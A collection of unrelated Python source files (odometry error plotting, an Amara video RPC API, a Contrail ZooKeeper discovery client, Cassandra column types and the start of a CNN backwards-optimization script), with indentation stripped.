# speed movement data
gps_speed=np.array([np.linalg.norm(gps_pts[i]-gps_pts[i-1]) for i in range(1,len(vo_inter))])
vo_speed=np.array([np.linalg.norm(vo_inter[i]-vo_inter[i-1]) for i in range(1,len(vo_inter))])
#print (gps_phis[0:10])
#print (vo_phis[0:10])
#print([gps_pts[i] for i in range(0,10)])
#print([vo_inter[i] for i in range(0,10)])
#print([vo_inter[i]-vo_inter[i-1] for i in range(1,10)])
#print(calcphi(vo_inter[2-2],vo_inter[2-1],vo_inter[2]))
#plt.plot(gps_pts[:10,0], gps_pts[:10,1], marker='o', color='r')
#plt.plot(vo_inter[:10,0], vo_inter[:10,1], marker='o', color='b')
trans_mse = np.mean(np.square(gps_speed - vo_speed))
trans_mae = np.mean(np.abs(gps_speed - vo_speed))
print("translation error MSE: ", trans_mse)
print("translation error MAE: ", trans_mae)
fig_speed = plt.figure(figsize=(12,8))
plt.plot(range(1,len(vo_inter)), gps_speed, marker='o', color='r', label="GPS")
plt.plot(range(1,len(vo_inter)), vo_speed, marker='o', color='b', label="visual odometry")
plt.title("MSE = " + str(trans_mse)[:5] + ", MAE = " + str(trans_mae)[:5], fontsize=20)
#plt.title('Speed', fontsize=14)
plt.xlabel('time (s)', fontsize=14)
plt.ylabel('distance (m)', fontsize=14)
plt.legend()
# plot scale error of visual odometry
fig_scale = plt.figure(figsize=(12,8))
scale_err = np.array(gps_speed) / np.array(vo_speed)
plt.plot(scale_err, marker='o', color='r')
plt.plot([0,120], [1.0,1.0], ls="--", color="k")
#fig_scale.suptitle('Scale error', fontsize=18)
plt.xlabel('time (s)', fontsize=14)
plt.ylabel('scale error (gps / odometry)', fontsize=14)
#print(gps_phis)
#print(vo_phis)
#print(np.square(gps_phis - vo_phis))
#print((gps_phis - vo_phis))
#print(np.square(gps_phis - vo_phis))
rot_mse = np.mean(np.square(gps_phis - vo_phis))
rot_mae = np.mean(np.abs(gps_phis - vo_phis))
print("rotation error MSE: ", rot_mse)
print("rotation error MAE: ", rot_mae)
fig_rot = plt.figure(figsize=(12,8))
plt.plot(range(1,len(vo_inter)-1), gps_phis, marker='o', color='r', label="GPS rotation angles")
plt.plot(range(1,len(vo_inter)-1), vo_phis, marker='o', color='b', label="odometry rotation angles")
#plt.plot(range(1,len(vo_inter)-1), gps_vo_phis[:-1], marker='o', color='b', label="TODO")
plt.xlabel('time (s)', fontsize=14)
plt.ylabel('angle (deg): <0 (right), >0 (left)', fontsize=14)
#plt.text(45, 20, "average error = " + str(rot_avgerr)[:5], color='b', fontsize=16)
plt.title("MSE = " + str(rot_mse)[:5] + ", MAE = " + str(rot_mae)[:5], fontsize=20)
plt.legend()
fig_path = plt.figure(figsize=(8,8))
#plt.axis('equal')
plt.axis([-50, 200, -100, 150], 'equal')
#gps_pts[:,1] += 40.0
# translate gps to (0,0)
gps_pts[:,0] -= gps_pts[0,0]
gps_pts[:,1] -= gps_pts[0,1]
vo_inter[:,0] -= vo_inter[0,0]
vo_inter[:,1] -= vo_inter[0,1]
vo_pts_crop[:,0] -= vo_pts_crop[0,0]
vo_pts_crop[:,1] -= vo_pts_crop[0,1]
angle = -2.0 #-2.02
#angle = -2.1 # alan calib
R_gps = np.array([[np.cos(angle), -np.sin(angle)], [np.sin(angle), np.cos(angle)]])
gps_pts = R_gps.dot(gps_pts.T)
gps_pts = gps_pts.T
print(gps_pts.shape)
print(vo_pts2D.shape)
gps_pts = np.vstack((gps_pts, gps_pts[0,:]))
plt.plot(gps_pts[:,0], gps_pts[:,1], marker='.', color='r', label="GPS")
plt.plot(gps_pts[::5,0], gps_pts[::5,1], marker='.', color='k', ls="")
plt.plot(vo_inter[:,0], vo_inter[:,1], marker='.', color='b', label="visual odometry")
plt.plot(vo_inter[::5,0], vo_inter[::5,1], marker='.', color='k', ls='')
#for i in range(0,len(vo_inter),10):
# plt.text(vo_inter[i,0]+2, vo_inter[i,1]+2, str(i), color='b')
# plt.text(gps_pts[i,0]+2, gps_pts[i,1]+2, str(i), color='r')
plt.xlabel("x (m)", fontsize=14)
plt.ylabel("z (m)", fontsize=14)
plt.legend(loc="upper left")
fig_path.savefig("plot_path_diff.png", bbox_inches='tight', transparent=True, dpi=200)
fig_speed.savefig("plot_speed.png", bbox_inches='tight')
fig_scale.savefig('plot_scale_error.png', bbox_inches='tight')
fig_rot.savefig("plot_rotation_diff.png", bbox_inches='tight')
plt.show()
|
# Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
import datetime
from django.conf import settings
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.template import RequestContext
from django.template.defaultfilters import slugify
from django.template.loader import render_to_string
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from subtitles.models import SubtitleLanguage
from videos.models import Video, Action
from videos.search_indexes import VideoIndex
from videos.tasks import send_change_title_email
from utils.celery_search_index import update_search_index
from utils.multi_query_set import MultiQuerySet
from utils.rpc import Error, Msg, RpcExceptionEvent, add_request_to_kwargs
from utils.translation import get_user_languages_from_request
VIDEOS_ON_PAGE = VideoIndex.IN_ROW*5
class VideosApiClass(object):
authentication_error_msg = ugettext_lazy(u'You should be authenticated.')
popular_videos_sorts = {
'week': 'week_views',
'month': 'month_views',
'year': 'year_views',
'total': 'total_views'
}
def unfeature_video(self, video_id, user):
if not user.has_perm('videos.edit_video'):
raise RpcExceptionEvent(_(u'You have not permission'))
try:
c = Video.objects.filter(pk=video_id).update(featured=None)
except (ValueError, TypeError):
raise RpcExceptionEvent(_(u'Incorrect video ID'))
if not c:
raise RpcExceptionEvent(_(u'Video does not exist'))
update_search_index.delay(Video, video_id)
return {}
def feature_video(self, video_id, user):
if not user.has_perm('videos.edit_video'):
raise RpcExceptionEvent(_(u'You have not permission'))
try:
c = Video.objects.filter(pk=video_id).update(featured=datetime.datetime.today())
except (ValueError, TypeError, Video.DoesNotExist):
raise RpcExceptionEvent(_(u'Incorrect video ID'))
if not c:
raise RpcExceptionEvent(_(u'Video does not exist'))
update_search_index.delay(Video, video_id)
return {}
@add_request_to_kwargs
def load_video_languages(self, video_id, user, request):
"""
Load langs for search pages. Will take into consideration
the languages the user speaks.
Ordering is user language, then completness , then percentage
then name of the language.
We're sorting all in memory since those sets should be pretty small
"""
LANGS_COUNT = 7
try:
video = Video.objects.get(pk=video_id)
except Video.DoesNotExist:
video = None
user_langs = get_user_languages_from_request(request)
langs = list(video.newsubtitlelanguage_set.having_nonempty_tip())
first_languages = [] #user languages and original
other_languages = [] #other languages already ordered by subtitle_count
for language in langs:
if language.language_code in user_langs or language.is_primary_audio_language():
first_languages.append(language)
else:
other_languages.append(language)
def _cmp_first_langs(lang1, lang2):
"""
languages should original in user_langs
"""
in_user_language_cmp = cmp(lang1.language_code in user_langs, lang2.language_code in user_langs)
#one is not in user language
if in_user_language_cmp != 0:
return in_user_language_cmp
if lang1.language_code in user_langs:
#both in user's language, sort alphabetically
return cmp(lang2.get_language_code_display(), lang1.get_language_code_display())
#one should be original
return cmp(lang1.is_original, lang2.is_original)
first_languages.sort(cmp=_cmp_first_langs, reverse=True)
#fill first languages to LANGS_COUNT
if len(first_languages) < LANGS_COUNT:
other_languages = other_languages[:(LANGS_COUNT-len(first_languages))]
other_languages.sort(lambda l1, l2: cmp(l1.get_language_code_display(), l2.get_language_code_display()))
langs = first_languages + other_languages
else:
langs = first_languages[:LANGS_COUNT]
context = {
'video': video,
'languages': langs
}
return {
'content': render_to_string('videos/_video_languages.html', context)
}
@add_request_to_kwargs
def load_featured_page(self, page, request, user):
sqs = VideoIndex.get_featured_videos()
return render_page(page, sqs, request=request)
@add_request_to_kwargs
def load_latest_page(self, page, request, user):
sqs = VideoIndex.public().order_by('-created')
return render_page(page, sqs, request=request)
@add_request_to_kwargs
def load_popular_page(self, page, sort, request, user):
sort_types = {
'today': 'today_views',
'week' : 'week_views',
'month': 'month_views',
'year' : 'year_views',
'total': 'total_views'
}
sort_field = sort_types.get(sort, 'week_views')
sqs = VideoIndex.get_popular_videos('-%s' % sort_field)
return render_page(page, sqs, request=request, display_views=sort)
@add_request_to_kwargs
def load_featured_page_volunteer(self, page, request, user):
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.filter(featured__gt=datetime.datetime(datetime.MINYEAR, 1, 1)) \
.order_by('-featured')
rest = rest.filter(featured__gt=datetime.datetime(datetime.MINYEAR, 1, 1)) \
.order_by('-featured')
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_requested_page_volunteer(self, page, request, user):
user_langs = get_user_languages_from_request(request)
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.filter(requests_exact__in=user_langs)
rest = rest.filter(requests_exact__in=user_langs)
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_latest_page_volunteer(self, page, request, user):
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.order_by('-created')
rest = rest.order_by('-created')
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_popular_page_volunteer(self, page, sort, request, user):
sort_types = {
'today': 'today_views',
'week' : 'week_views',
'month': 'month_views',
'year' : 'year_views',
'total': 'total_views'
}
sort_field = sort_types.get(sort, 'week_views')
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.order_by('-%s' % sort_field)
rest = rest.order_by('-%s' % sort_field)
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_popular_videos(self, sort, request, user):
sort_types = {
'today': 'today_views',
'week': 'week_views',
'month': 'month_views',
'year': 'year_views',
'total': 'total_views'
}
if sort in sort_types:
display_views = sort
sort_field = sort_types[sort]
else:
display_views = 'week'
sort_field = 'week_views'
popular_videos = VideoIndex.get_popular_videos('-%s' % sort_field)[:VideoIndex.IN_ROW]
context = {
'display_views': display_views,
'video_list': popular_videos
}
content = render_to_string('videos/_watch_page.html', context, RequestContext(request))
return {
'content': content
}
@add_request_to_kwargs
def load_popular_videos_volunteer(self, sort, request, user):
sort_types = {
'today': 'today_views',
'week': 'week_views',
'month': 'month_views',
'year': 'year_views',
'total': 'total_views'
}
sort_field = sort_types.get(sort, 'week_views')
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.order_by('-%s' % sort_field)[:5]
rest = rest.order_by('-%s' % sort_field)[:5]
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
context = {
'video_list': mqs
}
content = render_to_string('videos/_watch_page.html', context, RequestContext(request))
return {
'content': content
}
def change_title_video(self, video_pk, title, user):
title = title.strip()
if not user.is_authenticated():
return Error(self.authentication_error_msg)
if not title:
return Error(_(u'Title can\'t be empty'))
try:
video = Video.objects.get(pk=video_pk)
if title and not video.title or video.is_html5() or user.is_superuser:
if title != video.title:
old_title = video.title_display()
video.title = title
video.slug = slugify(video.title)
video.save()
update_search_index.delay(Video, video.pk)
Action.change_title_handler(video, user)
send_change_title_email.delay(video.id, user and user.id, old_title.encode('utf8'), video.title.encode('utf8'))
else:
return Error(_(u'Title can\'t be changed for this video'))
except Video.DoesNotExist:
return Error(_(u'Video does not exist'))
return Msg(_(u'Title was changed success'))
def follow(self, video_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
video = Video.objects.get(pk=video_id)
except Video.DoesNotExist:
return Error(_(u'Video does not exist.'))
video.followers.add(user)
for l in video.newsubtitlelanguage_set.all():
l.followers.add(user)
return Msg(_(u'You are following this video now.'))
def unfollow(self, video_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
video = Video.objects.get(pk=video_id)
except Video.DoesNotExist:
return Error(_(u'Video does not exist.'))
video.followers.remove(user)
for l in video.newsubtitlelanguage_set.all():
l.followers.remove(user)
return Msg(_(u'You stopped following this video now.'))
def follow_language(self, language_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
language = SubtitleLanguage.objects.get(pk=language_id)
except SubtitleLanguage.DoesNotExist:
return Error(_(u'Subtitles does not exist.'))
language.followers.add(user)
return Msg(_(u'You are following this subtitles now.'))
def unfollow_language(self, language_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
language = SubtitleLanguage.objects.get(pk=language_id)
except SubtitleLanguage.DoesNotExist:
return Error(_(u'Subtitles does not exist.'))
language.followers.remove(user)
return Msg(_(u'You stopped following this subtitles now.'))
def render_page(page, qs, on_page=VIDEOS_ON_PAGE, request=None,
template='videos/_watch_page.html', extra_context={},
display_views='total'):
paginator = Paginator(qs, on_page)
try:
page = int(page)
except ValueError:
page = 1
try:
page_obj = paginator.page(page)
except (EmptyPage, InvalidPage):
page_obj = paginator.page(paginator.num_pages)
context = {
'video_list': page_obj.object_list,
'page': page_obj,
'display_views': display_views
}
context.update(extra_context)
if request:
content = render_to_string(template, context, RequestContext(request))
else:
context['STATIC_URL'] = settings.STATIC_URL
content = render_to_string(template, context)
total = qs.count()
from_value = (page - 1) * on_page + 1
to_value = from_value + on_page - 1
if to_value > total:
to_value = total
return {
'content': content,
'total': total,
'pages': paginator.num_pages,
'from': from_value,
'to': to_value
}
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import re
import sys
import gevent
import kazoo.client
import kazoo.exceptions
import kazoo.handlers.gevent
import kazoo.recipe.election
import logging
from cfgm_common import jsonutils as json
import time
import disc_consts
from gevent.coros import BoundedSemaphore
class DiscoveryZkClient(object):
def __init__(self, discServer, zk_srv_ip='127.0.0.1',
zk_srv_port='2181', reset_config=False):
self._reset_config = reset_config
self._service_id_to_type = {}
self._ds = discServer
self._zk_sem = BoundedSemaphore(1)
self._election = None
self._restarting = False
zk_endpts = []
for ip in zk_srv_ip.split(','):
zk_endpts.append('%s:%s' %(ip, zk_srv_port))
# logging
logger = logging.getLogger('discovery-service')
logger.setLevel(logging.WARNING)
handler = logging.handlers.RotatingFileHandler('/var/log/contrail/discovery_zk.log', maxBytes=1024*1024, backupCount=10)
log_format = logging.Formatter('%(asctime)s [%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
handler.setFormatter(log_format)
logger.addHandler(handler)
self._zk = kazoo.client.KazooClient(
hosts=','.join(zk_endpts),
handler=kazoo.handlers.gevent.SequentialGeventHandler(),
logger=logger)
self._logger = logger
# connect
self.connect()
if reset_config:
self.delete_node("/services", recursive=True)
self.delete_node("/clients", recursive=True)
self.delete_node("/election", recursive=True)
# create default paths
self.create_node("/services")
self.create_node("/clients")
self.create_node("/election")
self._debug = {
'subscription_expires': 0,
'oos_delete': 0,
'db_excepts': 0,
}
# end __init__
# Discovery server used for syslog, cleanup etc
def set_ds(self, discServer):
self._ds = discServer
# end set_ds
def is_restarting(self):
return self._restarting
# end is_restarting
# restart
def restart(self):
self._zk_sem.acquire()
self._restarting = True
self.syslog("restart: acquired lock; state %s " % self._zk.state)
# initiate restart if our state is suspended or lost
if self._zk.state != "CONNECTED":
self.syslog("restart: starting ...")
try:
self._zk.stop()
self._zk.close()
self._zk.start()
self.syslog("restart: done")
except:
e = sys.exc_info()[0]
self.syslog('restart: exception %s' % str(e))
self._restarting = False
self._zk_sem.release()
# start
def connect(self):
while True:
try:
self._zk.start()
break
except gevent.event.Timeout as e:
self.syslog(
'Failed to connect with Zookeeper -will retry in a second')
gevent.sleep(1)
# Zookeeper is also throwing exception due to delay in master election
except Exception as e:
self.syslog('%s -will retry in a second' % (str(e)))
gevent.sleep(1)
self.syslog('Connected to ZooKeeper!')
# end
def start_background_tasks(self):
# spawn loop to expire subscriptions
gevent.Greenlet.spawn(self.inuse_loop)
# spawn loop to expire services
gevent.Greenlet.spawn(self.service_oos_loop)
# end
def syslog(self, log_msg):
if self._logger is None:
return
self._logger.info(log_msg)
# end
def get_debug_stats(self):
return self._debug
# end
def _zk_listener(self, state):
if state == "CONNECTED":
self._election.cancel()
# end
def _zk_election_callback(self, func, *args, **kwargs):
self._zk.remove_listener(self._zk_listener)
func(*args, **kwargs)
# end
def master_election(self, path, identifier, func, *args, **kwargs):
self._zk.add_listener(self._zk_listener)
while True:
self._election = self._zk.Election(path, identifier)
self._election.run(self._zk_election_callback, func, *args, **kwargs)
# end master_election
def create_node(self, path, value='', makepath=True, sequence=False):
value = str(value)
while True:
try:
return self._zk.set(path, value)
except kazoo.exceptions.NoNodeException:
self.syslog('create %s' % (path))
return self._zk.create(path, value, makepath=makepath, sequence=sequence)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
# end create_node
def get_children(self, path):
while True:
try:
return self._zk.get_children(path)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
except Exception:
return []
# end get_children
def read_node(self, path):
while True:
try:
data, stat = self._zk.get(path)
return data,stat
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
except kazoo.exceptions.NoNodeException:
self.syslog('exc read: node %s does not exist' % path)
return (None, None)
# end read_node
def delete_node(self, path, recursive=False):
while True:
try:
return self._zk.delete(path, recursive=recursive)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
except kazoo.exceptions.NoNodeException:
self.syslog('exc delete: node %s does not exist' % path)
return None
# end delete_node
def exists_node(self, path):
while True:
try:
return self._zk.exists(path)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
# end exists_node
def service_entries(self):
service_types = self.get_children('/services')
for service_type in service_types:
services = self.get_children('/services/%s' % (service_type))
for service_id in services:
data, stat = self.read_node(
'/services/%s/%s' % (service_type, service_id))
entry = json.loads(data)
yield(entry)
def subscriber_entries(self):
service_types = self.get_children('/clients')
for service_type in service_types:
subscribers = self.get_children('/clients/%s' % (service_type))
for client_id in subscribers:
cl_entry = self.lookup_client(service_type, client_id)
if cl_entry:
yield((client_id, service_type))
# end
def update_service(self, service_type, service_id, data):
path = '/services/%s/%s' % (service_type, service_id)
self.create_node(path, value=json.dumps(data), makepath=True)
# end
def insert_service(self, service_type, service_id, data):
# ensure election path for service type exists
path = '/election/%s' % (service_type)
self.create_node(path)
# preclude duplicate service entry
sid_set = set()
# prevent background task from deleting node under our nose
seq_list = self.get_children(path)
# data for election node is service ID
for sequence in seq_list:
sid, stat = self.read_node(
'/election/%s/%s' % (service_type, sequence))
if sid is not None:
sid_set.add(sid)
if not service_id in sid_set:
path = '/election/%s/node-' % (service_type)
pp = self.create_node(
path, service_id, makepath=True, sequence=True)
pat = path + "(?P<id>.*$)"
mch = re.match(pat, pp)
seq = mch.group('id')
data['sequence'] = seq
self.syslog('ST %s, SID %s not found! Added with sequence %s' %
(service_type, service_id, seq))
# end insert_service
# forget service and subscribers
def delete_service(self, service_type, service_id, recursive = False):
#if self.lookup_subscribers(service_type, service_id):
# return
path = '/services/%s/%s' %(service_type, service_id)
self.delete_node(path, recursive = recursive)
# delete service node if all services gone
path = '/services/%s' %(service_type)
if self.get_children(path):
return
self.delete_node(path)
#end delete_service
def lookup_service(self, service_type, service_id=None):
if not self.exists_node('/services/%s' % (service_type)):
return None
if service_id:
data = None
path = '/services/%s/%s' % (service_type, service_id)
datastr, stat = self.read_node(path)
if datastr:
data = json.loads(datastr)
clients = self.get_children(path)
data['in_use'] = len(clients)
return data
else:
r = []
services = self.get_children('/services/%s' % (service_type))
for service_id in services:
entry = self.lookup_service(service_type, service_id)
r.append(entry)
return r
# end lookup_service
def query_service(self, service_type):
path = '/election/%s' % (service_type)
if not self.exists_node(path):
return None
seq_list = self.get_children(path)
seq_list = sorted(seq_list)
r = []
for sequence in seq_list:
service_id, stat = self.read_node(
'/election/%s/%s' % (service_type, sequence))
entry = self.lookup_service(service_type, service_id)
r.append(entry)
return r
# end
# TODO use include_data available in new versions of kazoo
# tree structure /services/<service-type>/<service-id>
def get_all_services(self):
r = []
service_types = self.get_children('/services')
for service_type in service_types:
services = self.lookup_service(service_type)
r.extend(services)
return r
# end
def insert_client(self, service_type, service_id, client_id, blob, ttl):
data = {'ttl': ttl, 'blob': blob}
path = '/services/%s/%s/%s' % (service_type, service_id, client_id)
self.create_node(path, value=json.dumps(data))
path = '/clients/%s/%s/%s' % (service_type, client_id, service_id)
self.create_node(path, value=json.dumps(data), makepath=True)
# end insert_client
def lookup_subscribers(self, service_type, service_id):
path = '/services/%s/%s' % (service_type, service_id)
if not self.exists_node(path):
return None
clients = self.get_children(path)
return clients
# end lookup_subscribers
def lookup_client(self, service_type, client_id):
try:
datastr, stat = self.read_node(
'/clients/%s/%s' % (service_type, client_id))
data = json.loads(datastr) if datastr else None
except ValueError:
self.syslog('raise ValueError st=%s, cid=%s' %(service_type, client_id))
data = None
return data
# end lookup_client
def insert_client_data(self, service_type, client_id, cldata):
path = '/clients/%s/%s' % (service_type, client_id)
self.create_node(path, value=json.dumps(cldata), makepath=True)
# end insert_client_data
def lookup_subscription(self, service_type, client_id=None,
service_id=None, include_meta=False):
if not self.exists_node('/clients/%s' % (service_type)):
return None
if client_id and service_id:
try:
datastr, stat = self.read_node(
'/clients/%s/%s/%s'
% (service_type, client_id, service_id))
data = json.loads(datastr)
blob = data['blob']
if include_meta:
return (blob, stat, data['ttl'])
else:
return blob
except kazoo.exceptions.NoNodeException:
return None
elif client_id:
# our version of Kazoo doesn't support include_data :-(
try:
services = self.get_children(
'/clients/%s/%s' % (service_type, client_id))
r = []
for service_id in services:
datastr, stat = self.read_node(
'/clients/%s/%s/%s'
% (service_type, client_id, service_id))
if datastr:
data = json.loads(datastr)
blob = data['blob']
r.append((service_id, blob, stat))
# sort services in the order of assignment to this client
# (based on modification time)
rr = sorted(r, key=lambda entry: entry[2].last_modified)
return [(service_id, blob) for service_id, blob, stat in rr]
except kazoo.exceptions.NoNodeException:
return None
else:
clients = self.get_children('/clients/%s' % (service_type))
return clients
# end lookup_subscription
# delete client subscription. Cleanup path if possible
def delete_subscription(self, service_type, client_id, service_id):
path = '/clients/%s/%s/%s' % (service_type, client_id, service_id)
self.delete_node(path)
path = '/services/%s/%s/%s' % (service_type, service_id, client_id)
self.delete_node(path)
# delete client node if all subscriptions gone
path = '/clients/%s/%s' % (service_type, client_id)
if self.get_children(path):
return
self.delete_node(path)
# purge in-memory cache - ideally we are not supposed to know about
# this
self._ds.delete_sub_data(client_id, service_type)
# delete service node if all clients gone
path = '/clients/%s' % (service_type)
if self.get_children(path):
return
self.delete_node(path)
# end
# TODO use include_data available in new versions of kazoo
# tree structure /clients/<service-type>/<client-id>/<service-id>
# return tuple (service_type, client_id, service_id)
def get_all_clients(self):
r = []
service_types = self.get_children('/clients')
for service_type in service_types:
clients = self.get_children('/clients/%s' % (service_type))
for client_id in clients:
services = self.get_children(
'/clients/%s/%s' % (service_type, client_id))
rr = []
for service_id in services:
(datastr, stat, ttl) = self.lookup_subscription(
service_type, client_id, service_id, include_meta=True)
rr.append(
(service_type, client_id, service_id,
stat.last_modified, ttl))
rr = sorted(rr, key=lambda entry: entry[3])
r.extend(rr)
return r
# end get_all_clients
# reset in-use count of clients for each service
def inuse_loop(self):
while True:
service_types = self.get_children('/clients')
for service_type in service_types:
clients = self.get_children('/clients/%s' % (service_type))
for client_id in clients:
services = self.get_children(
'/clients/%s/%s' % (service_type, client_id))
for service_id in services:
path = '/clients/%s/%s/%s' % (
service_type, client_id, service_id)
datastr, stat = self.read_node(path)
data = json.loads(datastr)
now = time.time()
exp_t = stat.last_modified + data['ttl'] +\
disc_consts.TTL_EXPIRY_DELTA
if now > exp_t:
self.delete_subscription(
service_type, client_id, service_id)
self.syslog(
'Expiring st:%s sid:%s cid:%s'
% (service_type, service_id, client_id))
self._debug['subscription_expires'] += 1
gevent.sleep(10)
def service_oos_loop(self):
if self._ds._args.hc_interval <= 0:
return
while True:
for entry in self.service_entries():
if not self._ds.service_expired(entry, include_down=False):
continue
service_type = entry['service_type']
service_id = entry['service_id']
path = '/election/%s/node-%s' % (
service_type, entry['sequence'])
if not self.exists_node(path):
continue
self.syslog('Deleting sequence node %s for service %s:%s' %
(path, service_type, service_id))
self.delete_node(path)
entry['sequence'] = -1
self.update_service(service_type, service_id, entry)
self._debug['oos_delete'] += 1
gevent.sleep(self._ds._args.hc_interval)
# end
|
from datetime import datetime
import struct
import time
import warnings
__all__ = ['Column', 'DateTime', 'DateTimeString', 'Float64', 'FloatString',
'Long', 'IntString', 'String']
class Column(object):
"""Base class for typed columns."""
def __init__(self, default=None):
self.default = default
class DateTime(Column):
"""Column for :class:`datetime` objects stored as long timestamps."""
def __init__(self, *args, **kwargs):
Column.__init__(self, *args, **kwargs)
self.struct = struct.Struct('q')
def pack(self, val):
if not isinstance(val, datetime):
raise TypeError('expected datetime, %s found' % type(val).__name__)
return self.struct.pack(int(time.mktime(val.timetuple())))
def unpack(self, val):
return datetime.fromtimestamp(self.struct.unpack(val)[0])
class DateTimeString(Column):
"""
Column for :class:`datetime` objects stored as ``%Y-%m-%d %H:%M:%S``
"""
format = '%Y-%m-%d %H:%M:%S'
def pack(self, val):
if not isinstance(val, datetime):
raise TypeError('expected datetime, %s found' % type(val).__name__)
return val.strftime(self.format)
def unpack(self, val):
return datetime.strptime(val, self.format)
class Float64(Column):
"""Column for 64bit floats."""
def __init__(self, *args, **kwargs):
Column.__init__(self, *args, **kwargs)
self.struct = struct.Struct('d')
def pack(self, val):
if not isinstance(val, float):
raise TypeError('expected float, %s found' % type(val).__name__)
return self.struct.pack(val)
def unpack(self, val):
return self.struct.unpack(val)[0]
class FloatString(Column):
"""Column for floats stored as strings."""
def pack(self, val):
if not isinstance(val, float):
raise TypeError('expected float, %s found' % type(val).__name__)
return str(val)
def unpack(self, val):
return float(val)
class Long(Column):
"""
Column for 64bit ints.
This uses big-endian encoding, which is the normal encoding for integers
in Cassandra.
"""
def __init__(self, *args, **kwargs):
Column.__init__(self, *args, **kwargs)
self.struct = struct.Struct('>q')
def pack(self, val):
if not isinstance(val, (int, long)):
raise TypeError('expected int or long, %s found' % type(val).__name__)
return self.struct.pack(val)
def unpack(self, val):
return self.struct.unpack(val)[0]
class IntString(Column):
"""Column for ints stored as strings."""
def pack(self, val):
if not isinstance(val, (int, long)):
raise TypeError('expected int or long, %s found' % type(val).__name__)
return str(val)
def unpack(self, val):
return int(val)
class String(Column):
"""Column for :class:`str` or :class:`unicode` objects."""
def pack(self, val):
if not isinstance(val, basestring):
raise TypeError('expected str or unicode, %s found' % type(val).__name__)
return val
def unpack(self, val):
return val
|
"""Runs backwards optimization on a trained CNN."""
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import argparse
import numpy
from keras import backend as K
from gewittergefahr.gg_io import storm_tracking_io as tracking_io
from gewittergefahr.deep_learning import cnn
from gewittergefahr.deep_learning import deep_learning_utils as dl_utils
from gewittergefahr.deep_learning import model_interpretation
from gewittergefahr.deep_learning import backwards_optimization as backwards_opt
from gewittergefahr.deep_learning import testing_io
from gewittergefahr.deep_learning import training_validation_io as trainval_io
# random.seed(6695)
# numpy.random.seed(6695)
K.set_session(K.tf.Session(config=K.tf.ConfigProto(
intra_op_parallelism_threads=1, inter_op_parallelism_threads=1,
allow_soft_placement=False
)))
SEPARATOR_STRING = '\n\n' + '*' * 50 + '\n\n'
CLASS_COMPONENT_TYPE_STRING = model_interpretation.CLASS_COMPONENT_TYPE_STRING
NEURON_COMPONENT_TYPE_STRING = model_interpretation.NEURON_COMPONENT_TYPE_STRING
CHANNEL_COMPONENT_TYPE_STRING = (
model_interpretation.CHANNEL_COMPONENT_TYPE_STRING)
MODEL_FILE_ARG_NAME = 'input_model_file_name'
INIT_FUNCTION_ARG_NAME = 'init_function_name'
STORM_METAFILE_ARG_NAME = 'input_storm_metafile_name'
NUM_EXAMPLES_ARG_NAME = 'num_examples'
EXAMPLE_DIR_ARG_NAME = 'input_example_dir_name'
COMPONENT_TYPE_ARG_NAME = 'component_type_string'
TARGET_CLASS_ARG_NAME = 'target_class'
LAYER_NAME_ARG_NAME = 'layer_name'
NEURON_INDICES_ARG_NAME = 'neuron_indices'
CHANNEL_INDEX_ARG_NAME = 'channel_index'
IDEAL_ACTIVATION_ARG_NAME = 'ideal_activation'
NUM_ITERATIONS_ARG_NAME = 'num_iterations'
LEARNING_RATE_ARG_NAME = 'learning_rate'
L2_WEIGHT_ARG_NAME = 'l2_weight'
RADAR_CONSTRAINT_WEIGHT_ARG_NAME = 'radar_constraint_weight'
MINMAX_CONSTRAINT_WEIGHT_ARG_NAME = 'minmax_constraint_weight'
OUTPUT_FILE_ARG_NAME = 'output_file_name'
MODEL_FILE_HELP_STRING = (
'Path to file with trained CNN. Will be read by `cnn.read_model`.')
INIT_FUNCTION_HELP_STRING = (
'Initialization function (used to create initial input matrices for '
'gradient descent). Must be accepted by '
'`backwards_opt.check_init_function`. To initialize with real '
'dataset examples, leave this argument alone.')
STORM_METAFILE_HELP_STRING = (
'[used only if `{0:s}` is empty] Path to Pickle file with storm IDs and '
'times. Will be read by `storm_tracking_io.read_ids_and_times`.'
).format(INIT_FUNCTION_ARG_NAME)
